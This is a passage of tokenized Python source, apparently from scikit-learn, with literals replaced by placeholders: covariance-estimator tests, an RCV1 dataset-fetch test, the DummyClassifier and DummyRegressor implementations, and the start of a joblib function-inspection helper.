<s> import numpy as np <EOL> from sklearn . utils . testing import assert_almost_equal <EOL> from sklearn . utils . testing import assert_array_almost_equal <EOL> from sklearn . utils . testing import assert_array_equal <EOL> from sklearn . utils . testing import assert_raises <EOL> from sklearn . utils . testing import assert_warns <EOL> from sklearn . utils . testing import assert_greater <EOL> from sklearn import datasets <EOL> from sklearn . covariance import empirical_covariance , EmpiricalCovariance , ShrunkCovariance , shrunk_covariance , LedoitWolf , ledoit_wolf , ledoit_wolf_shrinkage , OAS , oas <EOL> X = datasets . load_diabetes ( ) . data <EOL> X_1d = X [ : , <NUM_LIT:0> ] <EOL> n_samples , n_features = X . shape <EOL> def test_covariance ( ) : <EOL> cov = EmpiricalCovariance ( ) <EOL> cov . fit ( X ) <EOL> emp_cov = empirical_covariance ( X ) <EOL> assert_array_almost_equal ( emp_cov , cov . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( cov . error_norm ( emp_cov ) , <NUM_LIT:0> ) <EOL> assert_almost_equal ( <EOL> cov . error_norm ( emp_cov , norm = '<STR_LIT>' ) , <NUM_LIT:0> ) <EOL> assert_almost_equal ( <EOL> cov . error_norm ( emp_cov , norm = '<STR_LIT>' ) , <NUM_LIT:0> ) <EOL> assert_almost_equal ( <EOL> cov . error_norm ( emp_cov , scaling = False ) , <NUM_LIT:0> ) <EOL> assert_almost_equal ( <EOL> cov . error_norm ( emp_cov , squared = False ) , <NUM_LIT:0> ) <EOL> assert_raises ( NotImplementedError , <EOL> cov . error_norm , emp_cov , norm = '<STR_LIT:foo>' ) <EOL> mahal_dist = cov . mahalanobis ( X ) <EOL> assert_greater ( np . amin ( mahal_dist ) , <NUM_LIT:0> ) <EOL> X_1d = X [ : , <NUM_LIT:0> ] . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> cov = EmpiricalCovariance ( ) <EOL> cov . fit ( X_1d ) <EOL> assert_array_almost_equal ( empirical_covariance ( X_1d ) , cov . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( cov . error_norm ( empirical_covariance ( X_1d ) ) , <NUM_LIT:0> ) <EOL> assert_almost_equal ( <EOL> cov . error_norm ( empirical_covariance ( X_1d ) , norm = '<STR_LIT>' ) , <NUM_LIT:0> ) <EOL> X_1sample = np . arange ( <NUM_LIT:5> ) . reshape ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> cov = EmpiricalCovariance ( ) <EOL> assert_warns ( UserWarning , cov . fit , X_1sample ) <EOL> assert_array_almost_equal ( cov . covariance_ , <EOL> np . zeros ( shape = ( <NUM_LIT:5> , <NUM_LIT:5> ) , dtype = np . float64 ) ) <EOL> X_integer = np . asarray ( [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> result = np . asarray ( [ [ <NUM_LIT> , - <NUM_LIT> ] , [ - <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( empirical_covariance ( X_integer ) , result ) <EOL> cov = EmpiricalCovariance ( assume_centered = True ) <EOL> cov . fit ( X ) <EOL> assert_array_equal ( cov . location_ , np . zeros ( X . shape [ <NUM_LIT:1> ] ) ) <EOL> def test_shrunk_covariance ( ) : <EOL> cov = ShrunkCovariance ( shrinkage = <NUM_LIT:0.5> ) <EOL> cov . fit ( X ) <EOL> assert_array_almost_equal ( <EOL> shrunk_covariance ( empirical_covariance ( X ) , shrinkage = <NUM_LIT:0.5> ) , <EOL> cov . covariance_ , <NUM_LIT:4> ) <EOL> cov = ShrunkCovariance ( ) <EOL> cov . fit ( X ) <EOL> assert_array_almost_equal ( <EOL> shrunk_covariance ( empirical_covariance ( X ) ) , cov . covariance_ , <NUM_LIT:4> ) <EOL> cov = ShrunkCovariance ( shrinkage = <NUM_LIT:0.> ) <EOL> cov . fit ( X ) <EOL> assert_array_almost_equal ( empirical_covariance ( X ) , cov . covariance_ , <NUM_LIT:4> ) <EOL> X_1d = X [ : , <NUM_LIT:0> ] . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> cov = ShrunkCovariance ( shrinkage = <NUM_LIT> ) <EOL> cov . fit ( X_1d ) <EOL> assert_array_almost_equal ( empirical_covariance ( X_1d ) , cov . covariance_ , <NUM_LIT:4> ) <EOL> cov = ShrunkCovariance ( shrinkage = <NUM_LIT:0.5> , store_precision = False ) <EOL> cov . fit ( X ) <EOL> assert ( cov . precision_ is None ) <EOL> def test_ledoit_wolf ( ) : <EOL> X_centered = X - X . mean ( axis = <NUM_LIT:0> ) <EOL> lw = LedoitWolf ( assume_centered = True ) <EOL> lw . fit ( X_centered ) <EOL> shrinkage_ = lw . shrinkage_ <EOL> score_ = lw . score ( X_centered ) <EOL> assert_almost_equal ( ledoit_wolf_shrinkage ( X_centered , <EOL> assume_centered = True ) , <EOL> shrinkage_ ) <EOL> assert_almost_equal ( ledoit_wolf_shrinkage ( X_centered , assume_centered = True , <EOL> block_size = <NUM_LIT:6> ) , <EOL> shrinkage_ ) <EOL> lw_cov_from_mle , lw_shinkrage_from_mle = ledoit_wolf ( X_centered , <EOL> assume_centered = True ) <EOL> assert_array_almost_equal ( lw_cov_from_mle , lw . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( lw_shinkrage_from_mle , lw . shrinkage_ ) <EOL> scov = ShrunkCovariance ( shrinkage = lw . shrinkage_ , assume_centered = True ) <EOL> scov . fit ( X_centered ) <EOL> assert_array_almost_equal ( scov . covariance_ , lw . covariance_ , <NUM_LIT:4> ) <EOL> X_1d = X [ : , <NUM_LIT:0> ] . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> lw = LedoitWolf ( assume_centered = True ) <EOL> lw . fit ( X_1d ) <EOL> lw_cov_from_mle , lw_shinkrage_from_mle = ledoit_wolf ( X_1d , <EOL> assume_centered = True ) <EOL> assert_array_almost_equal ( lw_cov_from_mle , lw . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( lw_shinkrage_from_mle , lw . shrinkage_ ) <EOL> assert_array_almost_equal ( ( X_1d ** <NUM_LIT:2> ) . sum ( ) / n_samples , lw . covariance_ , <NUM_LIT:4> ) <EOL> lw = LedoitWolf ( store_precision = False , assume_centered = True ) <EOL> lw . fit ( X_centered ) <EOL> assert_almost_equal ( lw . score ( X_centered ) , score_ , <NUM_LIT:4> ) <EOL> assert ( lw . precision_ is None ) <EOL> lw = LedoitWolf ( ) <EOL> lw . fit ( X ) <EOL> assert_almost_equal ( lw . shrinkage_ , shrinkage_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( lw . shrinkage_ , ledoit_wolf_shrinkage ( X ) ) <EOL> assert_almost_equal ( lw . shrinkage_ , ledoit_wolf ( X ) [ <NUM_LIT:1> ] ) <EOL> assert_almost_equal ( lw . score ( X ) , score_ , <NUM_LIT:4> ) <EOL> lw_cov_from_mle , lw_shinkrage_from_mle = ledoit_wolf ( X ) <EOL> assert_array_almost_equal ( lw_cov_from_mle , lw . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( lw_shinkrage_from_mle , lw . shrinkage_ ) <EOL> scov = ShrunkCovariance ( shrinkage = lw . shrinkage_ ) <EOL> scov . fit ( X ) <EOL> assert_array_almost_equal ( scov . covariance_ , lw . covariance_ , <NUM_LIT:4> ) <EOL> X_1d = X [ : , <NUM_LIT:0> ] . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> lw = LedoitWolf ( ) <EOL> lw . fit ( X_1d ) <EOL> lw_cov_from_mle , lw_shinkrage_from_mle = ledoit_wolf ( X_1d ) <EOL> assert_array_almost_equal ( lw_cov_from_mle , lw . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( lw_shinkrage_from_mle , lw . shrinkage_ ) <EOL> assert_array_almost_equal ( empirical_covariance ( X_1d ) , lw . covariance_ , <NUM_LIT:4> ) <EOL> X_1sample = np . arange ( <NUM_LIT:5> ) . reshape ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> lw = LedoitWolf ( ) <EOL> assert_warns ( UserWarning , lw . fit , X_1sample ) <EOL> assert_array_almost_equal ( lw . covariance_ , <EOL> np . zeros ( shape = ( <NUM_LIT:5> , <NUM_LIT:5> ) , dtype = np . float64 ) ) <EOL> lw = LedoitWolf ( store_precision = False ) <EOL> lw . fit ( X ) <EOL> assert_almost_equal ( lw . score ( X ) , score_ , <NUM_LIT:4> ) <EOL> assert ( lw . precision_ is None ) <EOL> def _naive_ledoit_wolf_shrinkage ( X ) : <EOL> n_samples , n_features = X . shape <EOL> emp_cov = empirical_covariance ( X , assume_centered = False ) <EOL> mu = np . trace ( emp_cov ) / n_features <EOL> delta_ = emp_cov . copy ( ) <EOL> delta_ . flat [ : : n_features + <NUM_LIT:1> ] -= mu <EOL> delta = ( delta_ ** <NUM_LIT:2> ) . sum ( ) / n_features <EOL> X2 = X ** <NUM_LIT:2> <EOL> beta_ = <NUM_LIT:1.> / ( n_features * n_samples ) * np . sum ( np . dot ( X2 . T , X2 ) / n_samples - emp_cov ** <NUM_LIT:2> ) <EOL> beta = min ( beta_ , delta ) <EOL> shrinkage = beta / delta <EOL> return shrinkage <EOL> def test_ledoit_wolf_small ( ) : <EOL> X_small = X [ : , : <NUM_LIT:4> ] <EOL> lw = LedoitWolf ( ) <EOL> lw . fit ( X_small ) <EOL> shrinkage_ = lw . shrinkage_ <EOL> assert_almost_equal ( shrinkage_ , _naive_ledoit_wolf_shrinkage ( X_small ) ) <EOL> def test_ledoit_wolf_large ( ) : <EOL> rng = np . random . RandomState ( <NUM_LIT:0> ) <EOL> X = rng . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:20> ) ) <EOL> lw = LedoitWolf ( block_size = <NUM_LIT:10> ) . fit ( X ) <EOL> assert_almost_equal ( lw . covariance_ , np . eye ( <NUM_LIT:20> ) , <NUM_LIT:0> ) <EOL> cov = lw . covariance_ <EOL> lw = LedoitWolf ( block_size = <NUM_LIT> ) . fit ( X ) <EOL> assert_almost_equal ( lw . covariance_ , cov ) <EOL> def test_oas ( ) : <EOL> X_centered = X - X . mean ( axis = <NUM_LIT:0> ) <EOL> oa = OAS ( assume_centered = True ) <EOL> oa . fit ( X_centered ) <EOL> shrinkage_ = oa . shrinkage_ <EOL> score_ = oa . score ( X_centered ) <EOL> oa_cov_from_mle , oa_shinkrage_from_mle = oas ( X_centered , <EOL> assume_centered = True ) <EOL> assert_array_almost_equal ( oa_cov_from_mle , oa . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( oa_shinkrage_from_mle , oa . shrinkage_ ) <EOL> scov = ShrunkCovariance ( shrinkage = oa . shrinkage_ , assume_centered = True ) <EOL> scov . fit ( X_centered ) <EOL> assert_array_almost_equal ( scov . covariance_ , oa . covariance_ , <NUM_LIT:4> ) <EOL> X_1d = X [ : , <NUM_LIT:0> : <NUM_LIT:1> ] <EOL> oa = OAS ( assume_centered = True ) <EOL> oa . fit ( X_1d ) <EOL> oa_cov_from_mle , oa_shinkrage_from_mle = oas ( X_1d , assume_centered = True ) <EOL> assert_array_almost_equal ( oa_cov_from_mle , oa . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( oa_shinkrage_from_mle , oa . shrinkage_ ) <EOL> assert_array_almost_equal ( ( X_1d ** <NUM_LIT:2> ) . sum ( ) / n_samples , oa . covariance_ , <NUM_LIT:4> ) <EOL> oa = OAS ( store_precision = False , assume_centered = True ) <EOL> oa . fit ( X_centered ) <EOL> assert_almost_equal ( oa . score ( X_centered ) , score_ , <NUM_LIT:4> ) <EOL> assert ( oa . precision_ is None ) <EOL> oa = OAS ( ) <EOL> oa . fit ( X ) <EOL> assert_almost_equal ( oa . shrinkage_ , shrinkage_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( oa . score ( X ) , score_ , <NUM_LIT:4> ) <EOL> oa_cov_from_mle , oa_shinkrage_from_mle = oas ( X ) <EOL> assert_array_almost_equal ( oa_cov_from_mle , oa . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( oa_shinkrage_from_mle , oa . shrinkage_ ) <EOL> scov = ShrunkCovariance ( shrinkage = oa . shrinkage_ ) <EOL> scov . fit ( X ) <EOL> assert_array_almost_equal ( scov . covariance_ , oa . covariance_ , <NUM_LIT:4> ) <EOL> X_1d = X [ : , <NUM_LIT:0> ] . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> oa = OAS ( ) <EOL> oa . fit ( X_1d ) <EOL> oa_cov_from_mle , oa_shinkrage_from_mle = oas ( X_1d ) <EOL> assert_array_almost_equal ( oa_cov_from_mle , oa . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( oa_shinkrage_from_mle , oa . shrinkage_ ) <EOL> assert_array_almost_equal ( empirical_covariance ( X_1d ) , oa . covariance_ , <NUM_LIT:4> ) <EOL> X_1sample = np . arange ( <NUM_LIT:5> ) . reshape ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> oa = OAS ( ) <EOL> assert_warns ( UserWarning , oa . fit , X_1sample ) <EOL> assert_array_almost_equal ( oa . covariance_ , <EOL> np . zeros ( shape = ( <NUM_LIT:5> , <NUM_LIT:5> ) , dtype = np . float64 ) ) <EOL> oa = OAS ( store_precision = False ) <EOL> oa . fit ( X ) <EOL> assert_almost_equal ( oa . score ( X ) , score_ , <NUM_LIT:4> ) <EOL> assert ( oa . precision_ is None ) </s>
<s> """<STR_LIT>""" <EOL> import errno <EOL> import scipy . sparse as sp <EOL> import numpy as np <EOL> from sklearn . datasets import fetch_rcv1 <EOL> from sklearn . utils . testing import assert_almost_equal <EOL> from sklearn . utils . testing import assert_array_equal <EOL> from sklearn . utils . testing import assert_equal <EOL> from sklearn . utils . testing import assert_true <EOL> from sklearn . utils . testing import SkipTest <EOL> def test_fetch_rcv1 ( ) : <EOL> try : <EOL> data1 = fetch_rcv1 ( shuffle = False , download_if_missing = False ) <EOL> except IOError as e : <EOL> if e . errno == errno . ENOENT : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> X1 , Y1 = data1 . data , data1 . target <EOL> cat_list , s1 = data1 . target_names . tolist ( ) , data1 . sample_id <EOL> assert_true ( sp . issparse ( X1 ) ) <EOL> assert_true ( sp . issparse ( Y1 ) ) <EOL> assert_equal ( <NUM_LIT> , X1 . data . size ) <EOL> assert_equal ( <NUM_LIT> , Y1 . data . size ) <EOL> assert_equal ( ( <NUM_LIT> , <NUM_LIT> ) , X1 . shape ) <EOL> assert_equal ( ( <NUM_LIT> , <NUM_LIT> ) , Y1 . shape ) <EOL> assert_equal ( ( <NUM_LIT> , ) , s1 . shape ) <EOL> assert_equal ( <NUM_LIT> , len ( cat_list ) ) <EOL> first_categories = [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' ] <EOL> assert_array_equal ( first_categories , cat_list [ : <NUM_LIT:6> ] ) <EOL> some_categories = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> number_non_zero_in_cat = ( <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT> ) <EOL> for num , cat in zip ( number_non_zero_in_cat , some_categories ) : <EOL> j = cat_list . index ( cat ) <EOL> assert_equal ( num , Y1 [ : , j ] . data . size ) <EOL> data2 = fetch_rcv1 ( shuffle = True , subset = '<STR_LIT:train>' , random_state = <NUM_LIT> , <EOL> download_if_missing = False ) <EOL> X2 , Y2 = data2 . data , data2 . target <EOL> s2 = data2 . sample_id <EOL> assert_array_equal ( np . sort ( s1 [ : <NUM_LIT> ] ) , np . sort ( s2 ) ) <EOL> some_sample_ids = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> for sample_id in some_sample_ids : <EOL> idx1 = s1 . tolist ( ) . index ( sample_id ) <EOL> idx2 = s2 . tolist ( ) . index ( sample_id ) <EOL> feature_values_1 = X1 [ idx1 , : ] . toarray ( ) <EOL> feature_values_2 = X2 [ idx2 , : ] . toarray ( ) <EOL> assert_almost_equal ( feature_values_1 , feature_values_2 ) <EOL> target_values_1 = Y1 [ idx1 , : ] . toarray ( ) <EOL> target_values_2 = Y2 [ idx2 , : ] . toarray ( ) <EOL> assert_almost_equal ( target_values_1 , target_values_2 ) </s>
<s> from __future__ import division <EOL> import warnings <EOL> import numpy as np <EOL> import scipy . sparse as sp <EOL> from . base import BaseEstimator , ClassifierMixin , RegressorMixin <EOL> from . utils import check_random_state <EOL> from . utils . validation import check_array <EOL> from . utils . validation import check_consistent_length <EOL> from . utils . random import random_choice_csc <EOL> from . utils . stats import _weighted_percentile <EOL> from . utils . multiclass import class_distribution <EOL> class DummyClassifier ( BaseEstimator , ClassifierMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , strategy = "<STR_LIT>" , random_state = None , <EOL> constant = None ) : <EOL> self . strategy = strategy <EOL> self . random_state = random_state <EOL> self . constant = constant <EOL> def fit ( self , X , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> if self . strategy not in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . strategy == "<STR_LIT>" and sp . issparse ( y ) : <EOL> y = y . toarray ( ) <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> UserWarning ) <EOL> self . sparse_output_ = sp . issparse ( y ) <EOL> if not self . sparse_output_ : <EOL> y = np . atleast_1d ( y ) <EOL> self . output_2d_ = y . ndim == <NUM_LIT:2> <EOL> if y . ndim == <NUM_LIT:1> : <EOL> y = np . reshape ( y , ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> self . n_outputs_ = y . shape [ <NUM_LIT:1> ] <EOL> if self . strategy == "<STR_LIT>" : <EOL> if self . constant is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> constant = np . reshape ( np . atleast_1d ( self . constant ) , ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> if constant . shape [ <NUM_LIT:0> ] != self . n_outputs_ : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % self . n_outputs_ ) <EOL> ( self . classes_ , <EOL> self . n_classes_ , <EOL> self . class_prior_ ) = class_distribution ( y , sample_weight ) <EOL> if ( self . strategy == "<STR_LIT>" and <EOL> any ( constant [ k ] not in self . classes_ [ k ] <EOL> for k in range ( self . n_outputs_ ) ) ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . n_outputs_ == <NUM_LIT:1> and not self . output_2d_ : <EOL> self . n_classes_ = self . n_classes_ [ <NUM_LIT:0> ] <EOL> self . classes_ = self . classes_ [ <NUM_LIT:0> ] <EOL> self . class_prior_ = self . class_prior_ [ <NUM_LIT:0> ] <EOL> return self <EOL> def predict ( self , X ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> X = check_array ( X , accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> n_samples = int ( X . shape [ <NUM_LIT:0> ] ) <EOL> rs = check_random_state ( self . random_state ) <EOL> n_classes_ = self . n_classes_ <EOL> classes_ = self . classes_ <EOL> class_prior_ = self . class_prior_ <EOL> constant = self . constant <EOL> if self . n_outputs_ == <NUM_LIT:1> : <EOL> n_classes_ = [ n_classes_ ] <EOL> classes_ = [ classes_ ] <EOL> class_prior_ = [ class_prior_ ] <EOL> constant = [ constant ] <EOL> if self . strategy == "<STR_LIT>" : <EOL> proba = self . predict_proba ( X ) <EOL> if self . n_outputs_ == <NUM_LIT:1> : <EOL> proba = [ proba ] <EOL> if self . sparse_output_ : <EOL> class_prob = None <EOL> if self . strategy in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> classes_ = [ np . array ( [ cp . argmax ( ) ] ) for cp in class_prior_ ] <EOL> elif self . strategy == "<STR_LIT>" : <EOL> class_prob = class_prior_ <EOL> elif self . strategy == "<STR_LIT>" : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif self . strategy == "<STR_LIT>" : <EOL> classes_ = [ np . array ( [ c ] ) for c in constant ] <EOL> y = random_choice_csc ( n_samples , classes_ , class_prob , <EOL> self . random_state ) <EOL> else : <EOL> if self . strategy in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> y = np . tile ( [ classes_ [ k ] [ class_prior_ [ k ] . argmax ( ) ] for <EOL> k in range ( self . n_outputs_ ) ] , [ n_samples , <NUM_LIT:1> ] ) <EOL> elif self . strategy == "<STR_LIT>" : <EOL> y = np . vstack ( classes_ [ k ] [ proba [ k ] . argmax ( axis = <NUM_LIT:1> ) ] for <EOL> k in range ( self . n_outputs_ ) ) . T <EOL> elif self . strategy == "<STR_LIT>" : <EOL> ret = [ classes_ [ k ] [ rs . randint ( n_classes_ [ k ] , size = n_samples ) ] <EOL> for k in range ( self . n_outputs_ ) ] <EOL> y = np . vstack ( ret ) . T <EOL> elif self . strategy == "<STR_LIT>" : <EOL> y = np . tile ( self . constant , ( n_samples , <NUM_LIT:1> ) ) <EOL> if self . n_outputs_ == <NUM_LIT:1> and not self . output_2d_ : <EOL> y = np . ravel ( y ) <EOL> return y <EOL> def predict_proba ( self , X ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> X = check_array ( X , accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> n_samples = int ( X . shape [ <NUM_LIT:0> ] ) <EOL> rs = check_random_state ( self . random_state ) <EOL> n_classes_ = self . n_classes_ <EOL> classes_ = self . classes_ <EOL> class_prior_ = self . class_prior_ <EOL> constant = self . constant <EOL> if self . n_outputs_ == <NUM_LIT:1> and not self . output_2d_ : <EOL> n_classes_ = [ n_classes_ ] <EOL> classes_ = [ classes_ ] <EOL> class_prior_ = [ class_prior_ ] <EOL> constant = [ constant ] <EOL> P = [ ] <EOL> for k in range ( self . n_outputs_ ) : <EOL> if self . strategy == "<STR_LIT>" : <EOL> ind = class_prior_ [ k ] . argmax ( ) <EOL> out = np . zeros ( ( n_samples , n_classes_ [ k ] ) , dtype = np . float64 ) <EOL> out [ : , ind ] = <NUM_LIT:1.0> <EOL> elif self . strategy == "<STR_LIT>" : <EOL> out = np . ones ( ( n_samples , <NUM_LIT:1> ) ) * class_prior_ [ k ] <EOL> elif self . strategy == "<STR_LIT>" : <EOL> out = rs . multinomial ( <NUM_LIT:1> , class_prior_ [ k ] , size = n_samples ) <EOL> elif self . strategy == "<STR_LIT>" : <EOL> out = np . ones ( ( n_samples , n_classes_ [ k ] ) , dtype = np . float64 ) <EOL> out /= n_classes_ [ k ] <EOL> elif self . strategy == "<STR_LIT>" : <EOL> ind = np . where ( classes_ [ k ] == constant [ k ] ) <EOL> out = np . zeros ( ( n_samples , n_classes_ [ k ] ) , dtype = np . float64 ) <EOL> out [ : , ind ] = <NUM_LIT:1.0> <EOL> P . append ( out ) <EOL> if self . n_outputs_ == <NUM_LIT:1> and not self . output_2d_ : <EOL> P = P [ <NUM_LIT:0> ] <EOL> return P <EOL> def predict_log_proba ( self , X ) : <EOL> """<STR_LIT>""" <EOL> proba = self . predict_proba ( X ) <EOL> if self . n_outputs_ == <NUM_LIT:1> : <EOL> return np . log ( proba ) <EOL> else : <EOL> return [ np . log ( p ) for p in proba ] <EOL> class DummyRegressor ( BaseEstimator , RegressorMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , strategy = "<STR_LIT>" , constant = None , quantile = None ) : <EOL> self . strategy = strategy <EOL> self . constant = constant <EOL> self . quantile = quantile <EOL> def fit ( self , X , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> if self . strategy not in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % self . strategy ) <EOL> y = check_array ( y , ensure_2d = False ) <EOL> if len ( y ) == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . output_2d_ = y . ndim == <NUM_LIT:2> <EOL> if y . ndim == <NUM_LIT:1> : <EOL> y = np . reshape ( y , ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> self . n_outputs_ = y . shape [ <NUM_LIT:1> ] <EOL> check_consistent_length ( X , y , sample_weight ) <EOL> if self . strategy == "<STR_LIT>" : <EOL> self . constant_ = np . average ( y , axis = <NUM_LIT:0> , weights = sample_weight ) <EOL> elif self . strategy == "<STR_LIT>" : <EOL> if sample_weight is None : <EOL> self . constant_ = np . median ( y , axis = <NUM_LIT:0> ) <EOL> else : <EOL> self . constant_ = [ _weighted_percentile ( y [ : , k ] , sample_weight , <EOL> percentile = <NUM_LIT> ) <EOL> for k in range ( self . n_outputs_ ) ] <EOL> elif self . strategy == "<STR_LIT>" : <EOL> if self . quantile is None or not np . isscalar ( self . quantile ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % self . quantile ) <EOL> percentile = self . quantile * <NUM_LIT> <EOL> if sample_weight is None : <EOL> self . constant_ = np . percentile ( y , axis = <NUM_LIT:0> , q = percentile ) <EOL> else : <EOL> self . constant_ = [ _weighted_percentile ( y [ : , k ] , sample_weight , <EOL> percentile = percentile ) <EOL> for k in range ( self . n_outputs_ ) ] <EOL> elif self . strategy == "<STR_LIT>" : <EOL> if self . constant is None : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . constant = check_array ( self . constant , <EOL> accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ensure_2d = False , ensure_min_samples = <NUM_LIT:0> ) <EOL> if self . output_2d_ and self . constant . shape [ <NUM_LIT:0> ] != y . shape [ <NUM_LIT:1> ] : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % y . shape [ <NUM_LIT:1> ] ) <EOL> self . constant_ = self . constant <EOL> self . constant_ = np . reshape ( self . constant_ , ( <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> return self <EOL> def predict ( self , X ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> X = check_array ( X , accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> n_samples = X . shape [ <NUM_LIT:0> ] <EOL> y = np . ones ( ( n_samples , <NUM_LIT:1> ) ) * self . constant_ <EOL> if self . n_outputs_ == <NUM_LIT:1> and not self . output_2d_ : <EOL> y = np . ravel ( y ) <EOL> return y </s>
<s> """<STR_LIT>""" <EOL> from itertools import islice <EOL> import inspect <EOL> import warnings <EOL> import re <EOL> import os <EOL> from . _compat import _basestring <EOL> from . logger import pformat <EOL> from . _memory_helpers import open_py_source <EOL> from . _compat import PY3_OR_LATER <EOL> def get_func_code ( func ) : <EOL> """<STR_LIT>""" <EOL> source_file = None <EOL> try : <EOL> code = func . __code__ <EOL> source_file = code . co_filename <EOL> if not os . path . exists ( source_file ) : <EOL> source_code = '<STR_LIT>' . join ( inspect . getsourcelines ( func ) [ <NUM_LIT:0> ] ) <EOL> line_no = <NUM_LIT:1> <EOL> if source_file . startswith ( '<STR_LIT>' ) : <EOL> source_file , line_no = re . match ( <EOL> '<STR_LIT>' , <EOL> source_file ) . groups ( ) <EOL> line_no = int ( line_no ) <EOL> source_file = '<STR_LIT>' % source_file <EOL> return source_code , source_file , line_no <EOL> with open_py_source ( source_file ) as source_file_obj : <EOL> first_line = code . co_firstlineno <EOL> source_lines = list ( islice ( source_file_obj , first_line - <NUM_LIT:1> , None ) ) <EOL> return '<STR_LIT>' . join ( inspect . getblock ( source_lines ) ) , source_file , first_line <EOL> except : <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> return str ( func . __code__ . __hash__ ( ) ) , source_file , - <NUM_LIT:1> <EOL> else : <EOL> return repr ( func ) , source_file , - <NUM_LIT:1> <EOL> def _clean_win_chars ( string ) : <EOL> """<STR_LIT>""" <EOL> import urllib <EOL> if hasattr ( urllib , '<STR_LIT>' ) : <EOL> quote = urllib . quote <EOL> else : <EOL> import urllib . parse <EOL> quote = urllib . parse . quote <EOL> for char in ( '<STR_LIT:<>' , '<STR_LIT:>>' , '<STR_LIT:!>' , '<STR_LIT::>' , '<STR_LIT:\\>' ) : <EOL> string = string . replace ( char , quote ( char ) ) <EOL> return string <EOL> def get_func_name ( func , resolv_alias = True , win_characters = True ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> module = func . __module__ <EOL> else : <EOL> try : <EOL> module = inspect . getmodule ( func ) <EOL> except TypeError : <EOL> if hasattr ( func , '<STR_LIT>' ) : <EOL> module = func . __class__ . __module__ <EOL> else : <EOL> module = '<STR_LIT>' <EOL> if module is None : <EOL> module = '<STR_LIT>' <EOL> if module == '<STR_LIT:__main__>' : <EOL> try : <EOL> filename = os . path . abspath ( inspect . getsourcefile ( func ) ) <EOL> except : <EOL> filename = None <EOL> if filename is not None : <EOL> parts = filename . split ( os . sep ) <EOL> if parts [ - <NUM_LIT:1> ] . startswith ( '<STR_LIT>' ) : <EOL> parts [ - 